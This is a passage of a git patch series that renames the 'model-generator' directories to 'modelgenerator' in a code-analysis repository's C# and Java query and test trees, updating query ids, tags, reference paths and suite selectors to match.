b/csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref index 1ebf2afb19b..d751f3823f3 100644 --- a/csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref +++ b/csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureSummaryModels.ql \ No newline at end of file +utils/modelgenerator/CaptureSummaryModels.ql \ No newline at end of file diff --git a/csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.qlref b/csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.qlref index 99c0975a4c2..73821d0ff84 100644 --- a/csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.qlref +++ b/csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureTypeBasedSummaryModels.ql \ No newline at end of file +utils/modelgenerator/CaptureTypeBasedSummaryModels.ql \ No newline at end of file diff --git a/java/ql/src/utils/model-generator/CaptureNeutralModels.ql b/java/ql/src/utils/model-generator/CaptureNeutralModels.ql index 96744de89b6..32d4ceb3aa9 100644 --- a/java/ql/src/utils/model-generator/CaptureNeutralModels.ql +++ b/java/ql/src/utils/model-generator/CaptureNeutralModels.ql @@ -2,8 +2,8 @@ * @name Capture neutral models. * @description Finds neutral models to be used by other queries. * @kind diagnostic - * @id java/utils/model-generator/neutral-models - * @tags model-generator + * @id java/utils/modelgenerator/neutral-models + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureModels diff --git a/java/ql/src/utils/model-generator/CaptureSinkModels.ql b/java/ql/src/utils/model-generator/CaptureSinkModels.ql index f047a8a13af..3d2cd5933ff 100644 --- a/java/ql/src/utils/model-generator/CaptureSinkModels.ql +++ b/java/ql/src/utils/model-generator/CaptureSinkModels.ql @@ -2,8 +2,8 @@ * @name Capture sink models. * @description Finds public methods that act as sinks as they flow into a known sink. * @kind diagnostic - * @id java/utils/model-generator/sink-models - * @tags model-generator + * @id java/utils/modelgenerator/sink-models + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureModels diff --git a/java/ql/src/utils/model-generator/CaptureSourceModels.ql b/java/ql/src/utils/model-generator/CaptureSourceModels.ql index 7dfc8e0ad34..fffc43adc78 100644 --- a/java/ql/src/utils/model-generator/CaptureSourceModels.ql +++ b/java/ql/src/utils/model-generator/CaptureSourceModels.ql @@ -2,8 +2,8 @@ * @name Capture source models. * @description Finds APIs that act as sources as they expose already known sources. * @kind diagnostic - * @id java/utils/model-generator/source-models - * @tags model-generator + * @id java/utils/modelgenerator/source-models + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureModels diff --git a/java/ql/src/utils/model-generator/CaptureSummaryModels.ql b/java/ql/src/utils/model-generator/CaptureSummaryModels.ql index a8d23ca5b34..33a21940d39 100644 --- a/java/ql/src/utils/model-generator/CaptureSummaryModels.ql +++ b/java/ql/src/utils/model-generator/CaptureSummaryModels.ql @@ -2,8 +2,8 @@ * @name Capture summary models. * @description Finds applicable summary models to be used by other queries. * @kind diagnostic - * @id java/utils/model-generator/summary-models - * @tags model-generator + * @id java/utils/modelgenerator/summary-models + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureModels diff --git a/java/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql b/java/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql index 1cdb5fe959f..959b6dc7f78 100644 --- a/java/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql +++ b/java/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql @@ -2,8 +2,8 @@ * @name Capture typed based summary models. * @description Finds applicable summary models to be used by other queries. * @kind diagnostic - * @id java/utils/model-generator/summary-models-typed-based - * @tags model-generator + * @id java/utils/modelgenerator/summary-models-typed-based + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureTypeBasedSummaryModels diff --git a/java/ql/src/utils/model-generator/RegenerateModels.py b/java/ql/src/utils/model-generator/RegenerateModels.py index 6bea57793a0..1f7df71776b 100755 --- a/java/ql/src/utils/model-generator/RegenerateModels.py +++ b/java/ql/src/utils/model-generator/RegenerateModels.py @@ -35,7 +35,7 @@ def regenerateModel(lgtmSlug, extractedDb): sys.exit(1) modelFile = lgtmSlugToModelFile[lgtmSlug] codeQlRoot = findGitRoot() - subprocess.check_call([codeQlRoot + "/java/ql/src/utils/model-generator/GenerateFlowModel.py", + subprocess.check_call([codeQlRoot + "/java/ql/src/utils/modelgenerator/GenerateFlowModel.py", "--with-summaries", "--with-sinks", "--with-neutrals", extractedDb, modelFile]) print("Regenerated " + modelFile) diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref b/java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref index cb6ef7faa65..851ddc0d294 100644 --- a/java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref +++ b/java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureNeutralModels.ql \ No newline at end of file +utils/modelgenerator/CaptureNeutralModels.ql \ No newline at end of file diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref b/java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref index c478ac760c4..36d2f144247 100644 --- a/java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref +++ b/java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureSinkModels.ql \ No newline at end of file +utils/modelgenerator/CaptureSinkModels.ql \ No newline at end of file diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref b/java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref index 10593c28e92..6bbb499fc27 100644 --- a/java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref +++ b/java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureSourceModels.ql \ No newline at end of file +utils/modelgenerator/CaptureSourceModels.ql \ No newline at end of file diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref b/java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref index 1ebf2afb19b..d751f3823f3 100644 --- a/java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref +++ b/java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureSummaryModels.ql \ No newline at end of file +utils/modelgenerator/CaptureSummaryModels.ql \ No newline at end of file diff --git a/misc/scripts/models-as-data/generate_flow_model.py b/misc/scripts/models-as-data/generate_flow_model.py index 30f90000d4c..c9699d1585b 100644 --- a/misc/scripts/models-as-data/generate_flow_model.py +++ b/misc/scripts/models-as-data/generate_flow_model.py @@ -33,7 +33,7 @@ class Generator: self.generateNeutrals = False self.generateTypeBasedSummaries = False self.dryRun = False - self.dirname = "model-generator" + self.dirname = "modelgenerator" def printHelp(self): diff --git a/misc/suite-helpers/code-scanning-selectors.yml b/misc/suite-helpers/code-scanning-selectors.yml index d587ffa7b34..a237728316b 100644 --- a/misc/suite-helpers/code-scanning-selectors.yml +++ b/misc/suite-helpers/code-scanning-selectors.yml @@ -30,4 +30,4 @@ - /Diagnostics/Internal/.*/ - exclude: tags contain: - - model-generator + - modelgenerator diff --git a/misc/suite-helpers/security-and-quality-selectors.yml b/misc/suite-helpers/security-and-quality-selectors.yml index c5068f87fd7..90a22352b80 100644 --- a/misc/suite-helpers/security-and-quality-selectors.yml +++ b/misc/suite-helpers/security-and-quality-selectors.yml @@ -31,4 +31,4 @@ - /Diagnostics/Internal/.*/ - exclude: tags contain: - - model-generator + - modelgenerator diff --git a/misc/suite-helpers/security-extended-selectors.yml b/misc/suite-helpers/security-extended-selectors.yml index 9d2f5851b78..aff154d0d30 100644 --- a/misc/suite-helpers/security-extended-selectors.yml +++ b/misc/suite-helpers/security-extended-selectors.yml @@ -36,4 +36,4 @@ - /Diagnostics/Internal/.*/ - exclude: tags contain: - - model-generator + - modelgenerator From 787b4743eece4141bc330a48557e249134df5ce3 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 20 Dec 2022 13:55:29 +0100 Subject: [PATCH 177/381] C#/Java: Rename the directories containing the model generator and tests. --- .../CaptureDiscardedSummaryModels.ql | 0 .../{model-generator => modelgenerator}/CaptureNeutralModels.ql | 0 .../{model-generator => modelgenerator}/CaptureSinkModels.ql | 0 .../{model-generator => modelgenerator}/CaptureSourceModels.ql | 0 .../{model-generator => modelgenerator}/CaptureSummaryModels.ql | 0 .../CaptureTypeBasedSummaryModels.ql | 0 .../{model-generator => modelgenerator}/GenerateFlowModel.py | 0 .../dataflow/CaptureNeutralModels.expected | 0 .../dataflow/CaptureNeutralModels.qlref | 0 .../dataflow/CaptureSinkModels.expected | 0 .../dataflow/CaptureSinkModels.qlref | 0 .../dataflow/CaptureSourceModels.expected | 0 .../dataflow/CaptureSourceModels.qlref | 0 .../dataflow/CaptureSummaryModels.expected | 0 .../dataflow/CaptureSummaryModels.qlref | 0 .../{model-generator => modelgenerator}/dataflow/NoSummaries.cs | 0 .../utils/{model-generator => modelgenerator}/dataflow/Sinks.cs | 0 .../utils/{model-generator => modelgenerator}/dataflow/Sources.cs | 0 .../{model-generator => modelgenerator}/dataflow/Summaries.cs | 0 .../utils/{model-generator => modelgenerator}/dataflow/options | 0 .../typebasedflow/CaptureTypeBasedSummaryModels.expected | 0 .../typebasedflow/CaptureTypeBasedSummaryModels.qlref | 0 .../typebasedflow/TypeBasedSummaries.cs | 0 .../{model-generator => modelgenerator}/CaptureNeutralModels.ql | 0 .../{model-generator => modelgenerator}/CaptureSinkModels.ql | 0 .../{model-generator => modelgenerator}/CaptureSourceModels.ql | 0 .../{model-generator => modelgenerator}/CaptureSummaryModels.ql | 0 .../CaptureTypeBasedSummaryModels.ql | 0 .../{model-generator => modelgenerator}/GenerateFlowModel.py | 0 .../utils/{model-generator => modelgenerator}/RegenerateModels.py | 0 .../dataflow/CaptureNeutralModels.expected | 0 .../dataflow/CaptureNeutralModels.qlref | 0 .../dataflow/CaptureSinkModels.expected | 0 .../dataflow/CaptureSinkModels.qlref | 0 .../dataflow/CaptureSourceModels.expected | 0 .../dataflow/CaptureSourceModels.qlref | 0 .../dataflow/CaptureSummaryModels.expected | 0 .../dataflow/CaptureSummaryModels.qlref | 0 .../dataflow/p/AbstractImplOfExternalSPI.java | 0 .../{model-generator => modelgenerator}/dataflow/p/Factory.java | 0 .../dataflow/p/FinalClass.java | 0 .../{model-generator => modelgenerator}/dataflow/p/FluentAPI.java | 0 .../dataflow/p/ImmutablePojo.java | 0 .../dataflow/p/ImplOfExternalSPI.java | 0 .../dataflow/p/InnerClasses.java | 0 .../dataflow/p/InnerHolder.java | 0 .../{model-generator => modelgenerator}/dataflow/p/Joiner.java | 0 .../dataflow/p/MultipleImpls.java | 0 .../{model-generator => modelgenerator}/dataflow/p/ParamFlow.java | 0 .../{model-generator => modelgenerator}/dataflow/p/Pojo.java | 0 .../dataflow/p/PrivateFlowViaPublicInterface.java | 0 .../{model-generator => modelgenerator}/dataflow/p/Sinks.java | 0 .../{model-generator => modelgenerator}/dataflow/p/SomeEnum.java | 0 .../{model-generator => modelgenerator}/dataflow/p/Sources.java | 0 .../typebasedflow/CaptureTypeBasedSummaryModels.expected | 0 .../typebasedflow/CaptureTypeBasedSummaryModels.ql | 0 .../typebasedflow/p/MyFunction.java | 0 .../typebasedflow/p/Stream.java | 0 .../typebasedflow/p/TypeBasedCollection.java | 0 .../typebasedflow/p/TypeBasedComplex.java | 0 .../typebasedflow/p/TypeBasedSimple.java | 0 61 files changed, 0 insertions(+), 0 deletions(-) rename csharp/ql/src/utils/{model-generator => modelgenerator}/CaptureDiscardedSummaryModels.ql (100%) rename csharp/ql/src/utils/{model-generator => modelgenerator}/CaptureNeutralModels.ql (100%) rename csharp/ql/src/utils/{model-generator => modelgenerator}/CaptureSinkModels.ql (100%) rename csharp/ql/src/utils/{model-generator => modelgenerator}/CaptureSourceModels.ql (100%) rename csharp/ql/src/utils/{model-generator => modelgenerator}/CaptureSummaryModels.ql (100%) rename csharp/ql/src/utils/{model-generator => modelgenerator}/CaptureTypeBasedSummaryModels.ql (100%) rename csharp/ql/src/utils/{model-generator => modelgenerator}/GenerateFlowModel.py (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureNeutralModels.expected (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureNeutralModels.qlref (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSinkModels.expected (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSinkModels.qlref (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSourceModels.expected (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSourceModels.qlref (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSummaryModels.expected (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSummaryModels.qlref (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/NoSummaries.cs (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/Sinks.cs (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/Sources.cs (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/Summaries.cs (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/dataflow/options (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/CaptureTypeBasedSummaryModels.expected (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/CaptureTypeBasedSummaryModels.qlref (100%) rename csharp/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/TypeBasedSummaries.cs (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/CaptureNeutralModels.ql (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/CaptureSinkModels.ql (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/CaptureSourceModels.ql (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/CaptureSummaryModels.ql (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/CaptureTypeBasedSummaryModels.ql (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/GenerateFlowModel.py (100%) rename java/ql/src/utils/{model-generator => modelgenerator}/RegenerateModels.py (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureNeutralModels.expected (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureNeutralModels.qlref (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSinkModels.expected (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSinkModels.qlref (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSourceModels.expected (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSourceModels.qlref (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSummaryModels.expected (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/CaptureSummaryModels.qlref (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/AbstractImplOfExternalSPI.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/Factory.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/FinalClass.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/FluentAPI.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/ImmutablePojo.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/ImplOfExternalSPI.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/InnerClasses.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/InnerHolder.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/Joiner.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/MultipleImpls.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/ParamFlow.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/Pojo.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/PrivateFlowViaPublicInterface.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/Sinks.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/SomeEnum.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/dataflow/p/Sources.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/CaptureTypeBasedSummaryModels.expected (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/CaptureTypeBasedSummaryModels.ql (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/p/MyFunction.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/p/Stream.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/p/TypeBasedCollection.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/p/TypeBasedComplex.java (100%) rename java/ql/test/utils/{model-generator => modelgenerator}/typebasedflow/p/TypeBasedSimple.java (100%) diff --git a/csharp/ql/src/utils/model-generator/CaptureDiscardedSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql similarity index 100% rename from csharp/ql/src/utils/model-generator/CaptureDiscardedSummaryModels.ql rename to csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql diff --git a/csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql similarity index 100% rename from csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql rename to csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql diff --git a/csharp/ql/src/utils/model-generator/CaptureSinkModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql similarity index 100% rename from csharp/ql/src/utils/model-generator/CaptureSinkModels.ql rename to csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql diff --git a/csharp/ql/src/utils/model-generator/CaptureSourceModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql similarity index 100% rename from csharp/ql/src/utils/model-generator/CaptureSourceModels.ql rename to csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql diff --git a/csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql similarity index 100% rename from csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql rename to csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql diff --git a/csharp/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql similarity index 100% rename from csharp/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql rename to csharp/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql diff --git a/csharp/ql/src/utils/model-generator/GenerateFlowModel.py b/csharp/ql/src/utils/modelgenerator/GenerateFlowModel.py similarity index 100% rename from csharp/ql/src/utils/model-generator/GenerateFlowModel.py rename to csharp/ql/src/utils/modelgenerator/GenerateFlowModel.py diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.expected b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.expected similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.expected rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.expected diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.qlref similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.qlref diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.expected b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.expected similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.expected rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.expected diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.qlref similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.qlref diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.expected b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.expected similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.expected rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.expected diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.qlref similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.qlref diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.expected b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.expected similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.expected rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.expected diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref b/csharp/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.qlref similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref rename to csharp/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.qlref diff --git a/csharp/ql/test/utils/model-generator/dataflow/NoSummaries.cs b/csharp/ql/test/utils/modelgenerator/dataflow/NoSummaries.cs similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/NoSummaries.cs rename to csharp/ql/test/utils/modelgenerator/dataflow/NoSummaries.cs diff --git a/csharp/ql/test/utils/model-generator/dataflow/Sinks.cs b/csharp/ql/test/utils/modelgenerator/dataflow/Sinks.cs similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/Sinks.cs rename to csharp/ql/test/utils/modelgenerator/dataflow/Sinks.cs diff --git a/csharp/ql/test/utils/model-generator/dataflow/Sources.cs b/csharp/ql/test/utils/modelgenerator/dataflow/Sources.cs similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/Sources.cs rename to csharp/ql/test/utils/modelgenerator/dataflow/Sources.cs diff --git a/csharp/ql/test/utils/model-generator/dataflow/Summaries.cs b/csharp/ql/test/utils/modelgenerator/dataflow/Summaries.cs similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/Summaries.cs rename to csharp/ql/test/utils/modelgenerator/dataflow/Summaries.cs diff --git a/csharp/ql/test/utils/model-generator/dataflow/options b/csharp/ql/test/utils/modelgenerator/dataflow/options similarity index 100% rename from csharp/ql/test/utils/model-generator/dataflow/options rename to csharp/ql/test/utils/modelgenerator/dataflow/options diff --git a/csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.expected b/csharp/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.expected similarity index 100% rename from csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.expected rename to csharp/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.expected diff --git a/csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.qlref b/csharp/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.qlref similarity index 100% rename from csharp/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.qlref rename to csharp/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.qlref diff --git a/csharp/ql/test/utils/model-generator/typebasedflow/TypeBasedSummaries.cs b/csharp/ql/test/utils/modelgenerator/typebasedflow/TypeBasedSummaries.cs similarity index 100% rename from csharp/ql/test/utils/model-generator/typebasedflow/TypeBasedSummaries.cs rename to csharp/ql/test/utils/modelgenerator/typebasedflow/TypeBasedSummaries.cs diff --git a/java/ql/src/utils/model-generator/CaptureNeutralModels.ql b/java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql similarity index 100% rename from java/ql/src/utils/model-generator/CaptureNeutralModels.ql rename to java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql diff --git a/java/ql/src/utils/model-generator/CaptureSinkModels.ql b/java/ql/src/utils/modelgenerator/CaptureSinkModels.ql similarity index 100% rename from java/ql/src/utils/model-generator/CaptureSinkModels.ql rename to java/ql/src/utils/modelgenerator/CaptureSinkModels.ql diff --git a/java/ql/src/utils/model-generator/CaptureSourceModels.ql b/java/ql/src/utils/modelgenerator/CaptureSourceModels.ql similarity index 100% rename from java/ql/src/utils/model-generator/CaptureSourceModels.ql rename to java/ql/src/utils/modelgenerator/CaptureSourceModels.ql diff --git a/java/ql/src/utils/model-generator/CaptureSummaryModels.ql b/java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql similarity index 100% rename from java/ql/src/utils/model-generator/CaptureSummaryModels.ql rename to java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql diff --git a/java/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql b/java/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql similarity index 100% rename from java/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql rename to java/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql diff --git a/java/ql/src/utils/model-generator/GenerateFlowModel.py b/java/ql/src/utils/modelgenerator/GenerateFlowModel.py similarity index 100% rename from java/ql/src/utils/model-generator/GenerateFlowModel.py rename to java/ql/src/utils/modelgenerator/GenerateFlowModel.py diff --git a/java/ql/src/utils/model-generator/RegenerateModels.py b/java/ql/src/utils/modelgenerator/RegenerateModels.py similarity index 100% rename from java/ql/src/utils/model-generator/RegenerateModels.py rename to java/ql/src/utils/modelgenerator/RegenerateModels.py diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.expected b/java/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.expected similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.expected rename to java/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.expected diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref b/java/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.qlref similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref rename to java/ql/test/utils/modelgenerator/dataflow/CaptureNeutralModels.qlref diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.expected b/java/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.expected similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.expected rename to java/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.expected diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref b/java/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.qlref similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref rename to java/ql/test/utils/modelgenerator/dataflow/CaptureSinkModels.qlref diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.expected b/java/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.expected similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.expected rename to java/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.expected diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref b/java/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.qlref similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref rename to java/ql/test/utils/modelgenerator/dataflow/CaptureSourceModels.qlref diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.expected b/java/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.expected similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.expected rename to java/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.expected diff --git a/java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref b/java/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.qlref similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref rename to java/ql/test/utils/modelgenerator/dataflow/CaptureSummaryModels.qlref diff --git a/java/ql/test/utils/model-generator/dataflow/p/AbstractImplOfExternalSPI.java b/java/ql/test/utils/modelgenerator/dataflow/p/AbstractImplOfExternalSPI.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/AbstractImplOfExternalSPI.java rename to java/ql/test/utils/modelgenerator/dataflow/p/AbstractImplOfExternalSPI.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/Factory.java b/java/ql/test/utils/modelgenerator/dataflow/p/Factory.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/Factory.java rename to java/ql/test/utils/modelgenerator/dataflow/p/Factory.java diff --git 